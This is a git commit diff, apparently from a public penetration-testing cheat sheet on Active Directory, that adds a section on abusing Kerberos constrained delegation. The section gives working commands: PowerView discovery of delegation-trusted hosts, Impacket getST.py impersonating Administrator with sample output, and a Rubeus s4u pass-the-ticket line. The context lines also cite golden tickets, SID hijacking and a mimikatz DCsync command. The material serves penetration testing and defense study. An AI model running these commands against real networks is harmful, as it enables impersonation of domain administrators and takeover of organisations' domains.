Kerberos Constrained Delegation

patch-1
Swissky 2020-02-23 21:20:46 +01:00
parent c5ac4e9eff
commit 74f2dfccca
1 changed files with 33 additions and 1 deletions

View File

@ -49,6 +49,7 @@
- [Trust relationship between domains](#trust-relationship-between-domains) - [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
- [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [Relay delegation with mitm6](#relay-delegation-with-mitm6)
- [PrivExchange attack](#privexchange-attack) - [PrivExchange attack](#privexchange-attack)
@ -1089,6 +1090,9 @@ Prerequisite:
```powershell ```powershell
$ Convert-NameToSid target.domain.com\krbtgt $ Convert-NameToSid target.domain.com\krbtgt
S-1-5-21-2941561648-383941485-1389968811-502 S-1-5-21-2941561648-383941485-1389968811-502
# with Impacket
lookupsid.py domain/user:password@10.10.10.10
``` ```
- Replace 502 with 519 to represent Enterprise Admins - Replace 502 with 519 to represent Enterprise Admins
- Create golden ticket and attack parent domain. - Create golden ticket and attack parent domain.
@ -1098,7 +1102,7 @@ Prerequisite:
### Kerberos Unconstrained Delegation ### Kerberos Unconstrained Delegation
> The user sends a TGS to access the service, along with their TGT, and then the service can use the users TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html > The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
Domain Compromise via DC Print Server and Unconstrained Delegation Domain Compromise via DC Print Server and Unconstrained Delegation
@ -1163,6 +1167,34 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA
* Ensure sensitive accounts cannot be delegated * Ensure sensitive accounts cannot be delegated
* Disable the Print Spooler Service * Disable the Print Spooler Service
### Kerberos Constrained Delegation
> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however,
Passing the -impersonate flag and specifying the user we wish to impersonate (any valid username).
```powershell
# Discover
$ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
# Find the service
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
# Exploit with Impacket
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
# Exploit with Rubeus
$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
```
### Kerberos Resource Based Constrained Delegation ### Kerberos Resource Based Constrained Delegation
Resource-based Constrained Delegation was introduced in Windows Server 2012. Resource-based Constrained Delegation was introduced in Windows Server 2012.